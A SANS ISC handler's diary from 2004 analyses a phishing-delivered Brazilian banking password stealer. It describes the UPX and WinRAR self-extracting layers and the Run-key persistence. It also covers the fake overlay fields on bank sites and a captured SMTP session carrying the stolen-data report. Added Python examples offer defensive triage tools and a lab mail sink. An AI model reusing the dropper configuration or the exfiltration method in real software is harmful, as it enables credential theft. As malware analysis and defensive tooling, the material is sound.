Handlers Diary December 14th 2004
Updated December 14th 2004 23:00 UTC (Handler: Pedro Bueno)
You got a Postcard!
Below is a simple malware analysis of a password stealer. This kind of
malware is becoming really common in Brazil: the miscreants send out
phishing e-mails that imitate Brazilian postcard web sites, delivering
thousands of them to users' mailboxes.
This one arrived in my own mailbox with the warning "Your partner is
cheating on you, see the pictures below!"... This simple analysis was done
with free tools available for Linux and Windows.
On Linux: strings, UPX, unrar
On Windows: Sysinternals tools (Regmon, Process Explorer) / ZoneAlarm Free
Introduction:
A suspicious file was received on Nov 30 through a spam mail with the
subject 'Your partner is cheating on you - see the pictures!' (in
Portuguese).
Sending it to VirusTotal showed that none of the 13 AV engines recognized
it as malware (malicious software).
So I decided to analyze it and see what I could find.
#####################
Phase 1: The Binary
#####################
Binary: fotos.sfx.exe
# strings -a fotos.sfx.exe
-------------SNIP!------------------------
This program must be run under Win32
UPX0
UPX1
.rsrc
1.20
UPX!
W!jfVB!
-------------SNIP!------------------------
The first lines already show something interesting: UPX.
UPX is a very common packer used to compress PE executables; the UPX0/UPX1
section names and the "UPX!" signature give it away.
The same upx tool packs and unpacks files, so removing this layer is easy:
#upx -d fotos.sfx.exe -o fotos.sfx.unp.exe
# strings -a -e l fotos.sfx.unp.exe | more
-------------SNIP!------------------------
No to A&ll
&Cancel
WinRAR self-extracting archive
-------------SNIP!------------------------
--> So the unpacked file is a WinRAR self-extracting archive (the string
is 16-bit Unicode, which is why plain strings output missed it).
To decompress it you can use unrar:
$ unrar x -v fotos.sfx.unp.exe
-------------SNIP!------------------------
UNRAR 2.71 freeware Copyright (c) 1993-2000 Eugene Roshal
Extracting from fotos.sfx.unp.exe
Unknown method in fotos.exe
Skipping fotos.exe
No files to extract
-------------SNIP!------------------------
--> One problem... "Unknown method" means this unrar 2.71 does not
understand the compression method used by the archive (it predates the
RAR 3.x format), so it skips the file.
SFX = Self-eXtracting archive: a RAR archive with an extraction stub and
an embedded script, and that script is what we want to read.
So I had to upgrade to a 3.x release (3.41):
# ./unrar x -v ../fotos.sfx.unp.exe
-------------SNIP!------------------------
UNRAR 3.41 freeware Copyright (c) 1993-2004 Alexander Roshal
Extracting from ../fotos.sfx.unp.exe
;The comment below contains SFX script commands
Path=C:\Windows\system32
SavePath
Setup=fotos.exe
Silent=2 (Hide start dialog)
Overwrite=2 (skip existing files)
Extracting fotos.exe OK
All OK
-------------SNIP!------------------------
The "comment" above is the SFX script: the parameters set when the
self-extracting archive was created. In this case:
Path=C:\Windows\system32 extracts the payload into the system directory
Setup=fotos.exe runs the extracted file once extraction is done
Silent=2 means the option 'Hide start dialog'
Overwrite=2 means the option 'skip existing files'
In other words: drop fotos.exe into system32 and run it, without showing
the user anything.
#####################
Phase 1: Results
#####################
- There are NO pictures in that file... :)
- It is an application (a self-extracting archive carrying another executable)
- It was packed with UPX
- It was compressed with WinRAR, with SFX script commands
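As an added example (not from the diary, and not the tools the handler used), here is a small Python script that automates the phase 1 static checks: it mimics `strings -a` and `strings -a -e l`, fingerprints the UPX section names and the WinRAR SFX marker, and pulls the SFX script commands out of a file image. The two sample blobs are constructed stand-ins for fotos.sfx.exe before and after unpacking; they contain only the markers the diary observed plus filler, not the real binary.

```python
import re

# Constructed stand-ins for fotos.sfx.exe before and after 'upx -d': only the
# markers the diary observed, padded with filler. Not the real binary.
PACKED_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"This program must be run under Win32\r\n$\x00"
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00.rsrc\x00\x00\x00"
    + b"1.20\x00UPX!\x00" + b"\xde\xad\xbe\xef" * 8
)
UNPACKED_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + "No to A&ll\0&Cancel\0WinRAR self-extracting archive\0".encode("utf-16-le")
    + b"\x00" * 16
    + b";The comment below contains SFX script commands\r\n"
    + b"Path=C:\\Windows\\system32\r\nSavePath\r\nSetup=fotos.exe\r\n"
    + b"Silent=2\r\nOverwrite=2\r\n"
    + b"Rar!\x1a\x07\x00" + b"\x00" * 16
)

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
RAR_MAGIC = b"Rar!\x1a\x07\x00"
UPX_MARKERS = {"UPX0", "UPX1", "UPX!"}
SFX_CMD_RE = re.compile(
    r"^(Path|SavePath|Setup|Presetup|Silent|Overwrite|TempMode|Title|Text|License|Update)"
    r"(?:=(.*))?$", re.I)

def ascii_strings(blob):
    """What 'strings -a' prints: printable ASCII runs of four or more bytes."""
    return [m.group().decode("ascii") for m in ASCII_RE.finditer(blob)]

def wide_strings(blob):
    """What 'strings -a -e l' prints: UTF-16LE runs, where GUI and SFX text hides."""
    return [m.group().decode("utf-16-le") for m in WIDE_RE.finditer(blob)]

def packer_hints(blob):
    """Cheap fingerprints for the two layers the diary peeled off."""
    hints = set()
    if UPX_MARKERS & set(ascii_strings(blob)):
        hints.add("UPX")
    if RAR_MAGIC in blob:
        hints.add("RAR")
    if any("WinRAR self-extracting archive" in s for s in wide_strings(blob)):
        hints.add("WinRAR SFX")
    return hints

def parse_sfx_script(blob):
    """Collect SFX script commands (the RAR 'comment') into a dict; bare commands map to True."""
    cmds = {}
    for s in ascii_strings(blob):
        m = SFX_CMD_RE.match(s.strip())
        if m:
            cmds[m.group(1)] = m.group(2) if m.group(2) is not None else True
    return cmds

def assess_sfx(cmds):
    """Turn the script into the findings an analyst writes down."""
    findings = []
    path = str(cmds.get("Path", ""))
    if re.search(r"\\(windows|winnt)\\system32\b|%systemroot%", path, re.I):
        findings.append(f"extracts into the Windows system directory ({path})")
    if "Setup" in cmds:
        findings.append(f"runs {cmds['Setup']} automatically after extraction")
    if str(cmds.get("Silent", "0")) in ("1", "2"):
        findings.append("hides the extraction dialog from the user")
    if str(cmds.get("Overwrite")) == "2":
        findings.append("skips existing files, so a resident copy is left untouched")
    return findings
```

Run packer_hints() on a sample first; if it reports UPX, unpack and run it again, then parse_sfx_script() on the result. A Path pointing into system32 together with Setup= and Silent=2 is the dropper profile seen here, and worth flagging on its own even before the payload is looked at.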
#####################
Phase 2: Analysis
#####################
strings run on the extracted fotos.exe now shows more interesting material...
Network Information:
-------------SNIP!------------------------
Network unreachable.
Host unreachable.
Connection refused.
TTL expired.
Network is down.
Network is unreachable.
Net dropped connection or reset.
Software caused connection abort.
Connection reset by peer.
-------------SNIP!------------------------
Registry Information:
-------------SNIP!------------------------
\Software\Microsoft\Windows\CurrentVersion\Run
-------------SNIP!------------------------
--> So it looks like it will register itself under that Run key to start automatically with Windows...
Application information:
-------------SNIP!------------------------
SOFTWARE\Borland\Delphi\RTL
-------------SNIP!------------------------
--> Delphi Run Time Library... so this is a Delphi application...
Mail strings:
-------------SNIP!------------------------
This is a multi-part message in MIME format
=_NextPart_2relrfksadvnqindyw3nerasdf
=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: multipart/alternative;
boundary="=_NextPart_2altrfkindysadvnqw3nerasdf"
--=_NextPart_2altrfkindysadvnqw3nerasdf
--=_NextPart_2altrfkindysadvnqw3nerasdf--
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
base64
attachment
application/octet-stream
Content-Type:
-------------SNIP!------------------------
--> MIME headers, multipart boundaries, base64 attachments... so this application builds and sends e-mail?
And some others strings of interest:
-------------SNIP!------------------------
=============Banco do Brasil======================
==================================================
BB Tit.=
BB Ag
nc.=
BB Cont.=
BB Senha A.=Atendimento=
BB Senha C.=
=============Banco Bradesco=======================
Bradesco Agencia=
Bradesco Conta=
Bradesco Digito=
Bradesco 4 digitos=
Bradesco Cartao=
Bradesco Resposta s.=
==============Caixa Economica=====================
Caixa Tipo=
Caixa Agencia=
Caixa Conta=
Caixa S. Intermet=
Caixa Ass. Eletronica=
=============Unibanco===========================
Unibanco 30 horas=
Unibanco Agencia=
Unibanco Conta=
Unibanco Digito=
Unibanco Senha=
Unibanco Assinatura=
Unibanco Cond. Alfanumerica=
=============Banco ITAU===========================
ITAU Conta=
ITAU Agencia=
ITAU Digito=
ITAU Senha Eletronica=
ITAU Senha do cartao=
ITAU % digitos do cartao=
ITAU Data dia=
ITAU Data mes=
ITAU Data ano=
ITAU Numero do portador=
-------------SNIP!------------------------
--> These are the names of some Brazilian banks. Basic Portuguese:
Agencia means branch, Conta means account and Senha means password.
and also:
-------------SNIP!------------------------
Conta em braco!
Senha em braco!
Senha do Auto-Atendimento
-------------SNIP!------------------------
--> More Portuguese lessons:
- Blank Account field!
- Blank Password field!
- Self-service (ATM) password
--> and this is still funny because they misspelled it... the correct word is 'branco' (blank), not 'braco'...
And finally, some email address:
- xxxxx1@yahoo.com.br
- xxxxx2@yahoo.com.br
- xxxxx3@yahoo.com.br
- xxxxx1@bol.com.br
- xxxxx1@tugamail.com
- xxxxxx@xxxxxx
and an IP address:
- xx.xx.80.21
#####################
Phase 2: Results
#####################
- This application will try to use network resources
- It writes something under \Software\Microsoft\Windows\CurrentVersion\Run (autostart)
- It was written in Delphi
- It is related in some way to e-mail (MIME headers and boundaries)
- It contains the names of Brazilian banks, and a report-style template of account, branch and password fields
- It has a list of e-mail addresses and one IP address
Putting it all together, we can assume that it is a password stealer which will mail the stolen passwords to those addresses... correct?
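The phase 2 reasoning is a classification of strings into buckets (persistence key, network error strings, MIME markers, bank names and credential field labels, e-mail addresses, IP addresses) followed by a judgement. As an added example, not part of the diary, the Python below does that classification over a constructed strings listing modelled on the output above; the addresses and the IP in the sample are placeholders (example.invalid, RFC 5737 TEST-NET), not the real indicators, and the verdict() rule simply makes the diary's own inference explicit.

```python
import re

# Constructed 'strings' output modelled on the diary. The addresses and IP are
# placeholders (example.invalid, RFC 5737 TEST-NET), not the real indicators.
SAMPLE_STRINGS = """\
Network unreachable.
Connection refused.
\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
SOFTWARE\\Borland\\Delphi\\RTL
This is a multi-part message in MIME format
Content-Type: multipart/alternative;
base64
=============Banco do Brasil======================
BB Senha C.=
=============Banco Bradesco=======================
Bradesco Agencia=
==============Caixa Economica=====================
Caixa Conta=
=============Unibanco===========================
Unibanco Senha=
=============Banco ITAU===========================
ITAU Senha Eletronica=
Conta em braco!
drop1@example.invalid
drop2@example.invalid
relay-owner@example.invalid
192.0.2.21
""".splitlines()

CATEGORIES = {
    "persistence": re.compile(r"\\CurrentVersion\\Run(Once|Services)?\b", re.I),
    "compiler": re.compile(r"Borland\\Delphi|\bIndy\b", re.I),
    "mail": re.compile(r"MIME|Content-Type|multipart|base64|NextPart", re.I),
    "winsock_errors": re.compile(r"connection (refused|reset)|unreachable|TTL expired", re.I),
    "credential_fields": re.compile(r"\b(senha|conta|agencia|cartao|assinatura)\b", re.I),
}
BANKS = {"banco do brasil": "Banco do Brasil", "bradesco": "Bradesco",
         "caixa": "Caixa Economica", "unibanco": "Unibanco", "itau": "Itau"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")

def classify_strings(lines):
    """Bucket each string into the categories the analysis looked for."""
    report = {name: [] for name in CATEGORIES}
    report.update(banks=set(), emails=[], ips=[])
    for line in lines:
        for name, rx in CATEGORIES.items():
            if rx.search(line):
                report[name].append(line)
        for needle, bank in BANKS.items():
            if needle in line.lower():
                report["banks"].add(bank)
        report["emails"].extend(EMAIL_RE.findall(line))
        report["ips"].extend(IPV4_RE.findall(line))
    return report

def verdict(report):
    """The same reasoning the diary applies by hand, as an explicit rule."""
    exfil_channel = bool(report["emails"] or report["ips"]) and bool(report["mail"])
    if report["banks"] and report["credential_fields"] and exfil_channel:
        return "likely banking credential stealer with SMTP exfiltration"
    if report["banks"] and report["credential_fields"]:
        return "banking credential harvesting, exfiltration channel unclear"
    return "insufficient static evidence"
```

Feed it the real `strings -a` output split into lines. The verdict is only a triage hint: strings can be encrypted, padded with decoys or simply absent, which is why the diary goes on to run the sample.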
#####################
Phase 3: Running...
#####################
To confirm my assumptions, I decided to run this malware on a Win2k
machine. Although we found no signs of VM detection in the strings, it was
run on a real, sacrificial Win2k box rather than a virtual machine.
-------------SNIP!------------------------
D:\virus\fotos.sfx.unp.unr.exe>fotos.exe
D:\virus\fotos.sfx.unp.unr.exe>
-------------SNIP!------------------------
Our good friend Regmon, shows this:
-------------SNIP!------------------------
fotos.exe:1888 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS
fotos.exe:1888 SetValue
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos SUCCESS
"D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"
fotos.exe:1888 CloseKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS
-------------SNIP!------------------------
That means our process fotos.exe (PID 1888) called CreateKey on
HKLM\Software\Microsoft\Windows\CurrentVersion\Run (the key already
exists, so this simply opens it) and then SetValue to add a value named
'fotos' whose data is the path to its own executable,
"D:\virus\fotos.sfx.unp.unr.exe\fotos.exe". Everything listed under that
Run key is started at every logon, so this is the persistence mechanism.
On a real victim the SFX script would have dropped the file into
C:\Windows\system32, so the value would presumably point there instead of
my analysis directory.
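Picking Run-key writes out of a Regmon trace is the kind of thing worth scripting, because a busy trace buries the three lines above among thousands of benign registry operations. The Python below is an added example (not from the diary) that parses Regmon-style lines and reports every successful SetValue under an autostart key. The sample trace is constructed from the diary's lines plus benign filler; the trusted-directory heuristic is deliberately weak and the comment says why.

```python
import re

# Constructed Regmon-style trace modelled on the diary's output; the
# explorer.exe and setup.exe lines are benign filler for contrast.
REGMON_SAMPLE = [
    r'explorer.exe:1012 QueryValue HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Synchronization Manager SUCCESS "mobsync.exe /logon"',
    r'fotos.exe:1888 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS',
    r'fotos.exe:1888 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos SUCCESS "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"',
    r'fotos.exe:1888 CloseKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS',
    r'fotos.exe:1888 OpenKey HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\Protocol_Catalog9 SUCCESS',
    r'setup.exe:2000 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater SUCCESS "C:\Program Files\Vendor\updater.exe"',
]

# process:pid  operation  path  result  [data]  (path may contain spaces)
EVENT_RE = re.compile(
    r"^(?P<process>\S+?):(?P<pid>\d+)\s+(?P<op>\w+)\s+(?P<path>.+?)\s+"
    r"(?P<result>SUCCESS|NOTFOUND|ACCDENIED|BUFOVRFLOW|NOMORE)(?:\s+(?P<data>.*))?$"
)
AUTORUN_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\"
    r"(Run|RunOnce|RunServices|RunServicesOnce)\\(?P<name>[^\\]+)$", re.I
)
# Where legitimate autostart binaries usually live. Weak on purpose: the SFX
# script seen in phase 1 drops fotos.exe into system32, which would pass this.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\winnt\\", "c:\\program files\\")

def parse_event(line):
    """One Regmon line into a dict, or None if the line is not an event."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev["data"] = (ev["data"] or "").strip().strip('"')
    return ev

def find_persistence(lines):
    """Every successful SetValue under an autostart key, with who wrote it."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["op"] != "SetValue" or ev["result"] != "SUCCESS":
            continue
        m = AUTORUN_RE.search(ev["path"])
        if not m:
            continue
        findings.append({
            "process": ev["process"], "pid": ev["pid"],
            "key": ev["path"][: m.start("name") - 1], "value_name": m.group("name"),
            "data": ev["data"],
            "trusted_location": ev["data"].lower().startswith(TRUSTED_DIRS),
        })
    return findings
```

The interesting signal is the combination: a process writing its own path into Run. Pair the finding with the process image path from Process Explorer rather than trusting the directory heuristic alone.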
Another friend, Process Explorer, also shows good information:
-------------SNIP!------------------------
HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\Protocol_Catalog9
HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\NameSpace_Catalog5
-------------SNIP!------------------------
Winsock... interesting. We knew from the strings that this application
would try to use the network, and the Winsock catalog lookups confirm it:
any program that initializes the Winsock library reads these catalog
keys, so by themselves they only tell us that it intends to talk, not to
whom.
Taken together, the traces so far show how the malware settles in on the
victim's machine (autostart entry plus network setup); how it gets at the
banking data is the next thing to look at.
So, let's try to browse to one of those banks' web sites...
Navigating to one of the bank web sites with IE was kind of funny... I
don't know if it was because of the IE Google toolbar, but the real web
site loaded almost perfectly, except that there was another pair of
branch and account fields overlapping the real ones...
Entering fake data in the fields, or nothing at all, and pressing OK
opened another window requesting more data: more passwords and personal
information. After filling everything in with some 'good data' and
pressing OK, ZoneAlarm came up with an alert:
-------------SNIP!------------------------
Do you want to allow fotos.exe to access the internet?
Technical Information
Destination IP: xx.xx.80.21:SMTP
Application: fotos.exe
-------------SNIP!------------------------
Hmmm... so that's why we had this IP address in the list... SMTP, e-mail addresses... now it is starting to make sense... :)
But xx.xx.80.21 resolves to a hosting provider, not to any of the e-mail domains we found... Maybe an open relay??
#####################
Phase 3: Results
#####################
So, that's what we have so far:
- It creates a value named fotos under
HKLM\Software\Microsoft\Windows\CurrentVersion\Run with the data
"D:\virus\fotos.sfx.unp.unr.exe\fotos.exe", so it starts at every logon
- It uses Winsock for network access
- It creates fake fields for password, account, branch and some personal
information, overlapping the real fields of the bank web sites
- It tries to reach an SMTP server at the IP address we found a few steps ago...
From now on, we should think of this application much like spyware. As we
could notice, it has something to send; the question is what.
############################
Phase 4: Final experiments
############################
So, let's set up a mail server and see what this application is trying to send to that IP.
On another machine in the same lab network, I brought up a virtual
interface with the same IP address that ZoneAlarm detected, and repeated
the steps of phase 3: visiting the web sites and filling in the fake
forms. After pressing the last OK, ZoneAlarm alerted me again, and this
time I allowed it to connect to port 25 of that IP address.
My mail server completed the whole transaction, reproduced below with the help of another friend, Ethereal:
-------------SNIP!------------------------------------------------------
220 localhost.localdomain ESMTP Sendmail 8.12.10/8.12.10; Tue, 30 Nov 2004
17:32:53 -0200
EHLO starinfo
250-localhost.localdomain Hello starinfo [10.0.0.2], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-DELIVERBY
250 HELP
RSET
250 2.0.0 Reset state
MAIL FROM:<xxxxxx1@bol.com.br>
250 2.1.0 <xxxxxx1@bol.com.br>... Sender ok
RCPT TO:<xxxxxx1@yahoo.com.br>
250 2.1.5 <xxxxxx1@yahoo.com.br>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: xxxxxx1@bol.com.br
Subject: xxxxxx1
To: xxxxxx1@yahoo.com.br
Content-Type: text/plain
Date: Tue, 30 Nov 2004 17:33:02 -0200
X-Priority: 3
X-Library: Indy 9.00.10
=============Banco do Brasil======================
==================================================
BB Tit.= 1. Titular
BB Ag.nc.=
BB Cont.=
BB Senha A.=Atendimento=
BB Senha C.=
==================================================
=============Banco Bradesco=======================
Bradesco Agencia=
Bradesco Conta=
Bradesco Digito=
Bradesco 4 digitos=
Bradesco Cartao=
Bradesco Resposta s.=
==================================================
==============Caixa Economica=====================
Caixa Tipo= 001-Cta. Corrente - P.F.sica
Caixa Agencia=
Caixa Conta=
Caixa S. Intermet=
Caixa Ass. Eletronica=
==================================================
=============Unibanco===========================
Unibanco 30 horas=Internet 30 Horas
Unibanco Agencia=3333
Unibanco Conta=333333
Unibanco Digito=1
Unibanco Senha=1111
Unibanco Assinatura=123123123123123123123
Unibanco Cond. Alfanumerica=zaqxsw
==================================================
=============Banco ITAU===========================
ITAU Conta=
ITAU Agencia=
ITAU Digito=
ITAU Senha Eletronica=
ITAU Senha do cartao=
ITAU % digitos do cartao=
ITAU Data dia=
ITAU Data mes=
ITAU Data ano=
ITAU Numero do portador=
==================================================
=============GErenciador Financeiro===============
Gerenciador Chave=
Gerenciador Senha Acesso=
Gerenciador Senha Conta=
=================================================
============ufaaa acabo :D=======================
.
250 2.0.0 iAUJWrLK000991 Message accepted for delivery
QUIT
221 2.0.0 localhost.localdomain closing connection
-------------SNIP!--------------------------------------------------
Yep... it was sending a report with all the information gathered. Only the
Unibanco block, the form I actually filled in, carries data; the other
banks' sections hold empty fields and a few default selections. The
'X-Library: Indy 9.00.10' header also fits the Delphi finding, since Indy
is the Internet component suite used with Delphi.
Interesting stuff... the last line of the report is 'ufaaa acabo', which
roughly means 'phew, it's over': finally, the end...
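The phase 4 trick, standing up a mail server on the address the malware has hard-coded so that it delivers its report to you instead of to the real relay, is worth having as a reusable tool. The Python below is an added example, not the Sendmail setup the diary used: a minimal SMTP sink that answers like a relay, records every message and forwards nothing, plus a parser that pulls the filled-in key=value fields out of a captured report. The simulated_stealer() client stands in for the malware for offline testing, and its report is a constructed fragment in the layout captured above with fake values; the hostnames and addresses (sink.lab, victim.lab, example.invalid) are placeholders.

```python
import re
import smtplib
import socketserver
import threading
from email import message_from_string
from email.message import EmailMessage
from email.policy import default

def addr(arg):
    """Pull the address out of 'FROM:<x@y>' / 'TO:<x@y>' arguments."""
    m = re.search(r"<([^>]*)>", arg)
    return m.group(1) if m else arg.split(":", 1)[-1].strip()

class SmtpSinkHandler(socketserver.StreamRequestHandler):
    """Minimal SMTP sink: talks like a relay, accepts every message, relays none."""

    def reply(self, line):
        self.wfile.write((line + "\r\n").encode("ascii"))

    def handle(self):
        self.reply("220 sink.lab ESMTP capture sink")
        env, body, in_data = {"mail_from": None, "rcpt_to": []}, [], False
        while True:
            raw = self.rfile.readline()
            if not raw:
                break                                   # client went away
            line = raw.decode("latin-1").rstrip("\r\n")
            if in_data:                                 # inside DATA: collect until "."
                if line == ".":
                    in_data = False
                    env["data"] = "\n".join(body)
                    self.server.captured.append(env)    # record, never forward
                    env = {"mail_from": None, "rcpt_to": []}
                    self.reply("250 2.0.0 Message accepted for delivery")
                else:
                    body.append(line[1:] if line.startswith("..") else line)
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self.reply("250 sink.lab")
            elif verb == "MAIL":
                env["mail_from"] = addr(arg)
                self.reply("250 2.1.0 Sender ok")
            elif verb == "RCPT":
                env["rcpt_to"].append(addr(arg))
                self.reply("250 2.1.5 Recipient ok")
            elif verb == "DATA":
                body, in_data = [], True
                self.reply('354 Enter mail, end with "." on a line by itself')
            elif verb in ("RSET", "NOOP"):
                self.reply("250 2.0.0 OK")
            elif verb == "QUIT":
                self.reply("221 2.0.0 sink.lab closing connection")
                break
            else:
                self.reply("502 5.5.1 Command not implemented")

def run_sink(send):
    """Start the sink on a loopback port, let send(host, port) talk to it, return captures."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), SmtpSinkHandler)
    server.daemon_threads = True
    server.captured = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        send(*server.server_address)
    finally:
        server.shutdown()
        server.server_close()
    return server.captured

def message_body(raw):
    """Drop the RFC 822 headers the sender added; return the plain-text report."""
    return message_from_string(raw, policy=default).get_content()

def filled_fields(report):
    """key=value lines with a non-empty value; separator rows start with '='."""
    out = {}
    for line in report.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() and not line.startswith("=") and value.strip():
            out[key.strip()] = value.strip()
    return out

# Constructed report in the layout the diary captured; every value is fake.
CONSTRUCTED_REPORT = """\
=============Unibanco===========================
Unibanco Agencia=3333
Unibanco Conta=333333
Unibanco Senha=1111
==================================================
=============Banco ITAU===========================
ITAU Conta=
ITAU Senha Eletronica=
============ufaaa acabo :D=======================
"""

def simulated_stealer(host, port):
    """Plays the malware's side: one plain-text report to a hard-coded drop address."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "stealer@example.invalid", "drop@example.invalid", "report"
    msg.set_content(CONSTRUCTED_REPORT)
    with smtplib.SMTP(host, port, local_hostname="victim.lab", timeout=10) as smtp:
        smtp.send_message(msg)
```

In the lab you would bind the sink to the address the sample has hard-coded (port 25, so it needs privileges) on an isolated network, exactly as the diary did with its virtual interface, and then trigger the sample; run_sink(simulated_stealer) exercises the same exchange offline. The sink accepts any sender and recipient on purpose: the point is to capture, and a 250 for every RCPT is also what makes a real open relay attractive to this kind of malware.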
########################
Phase 4: Final Results
########################
- Our assumptions were proven right: this piece of malware sends a report
with the stolen user information (account, branch, passwords...) through
an SMTP relay to those e-mail addresses.
And finally, after sending this malware to a list of AV vendors, by the
end of today 3 AV engines on VirusTotal were already detecting it!
--------------------------------------------------------------------
Handler on Duty for the last time this year: Pedro Bueno (pbueno /AT/ isc.sans.org)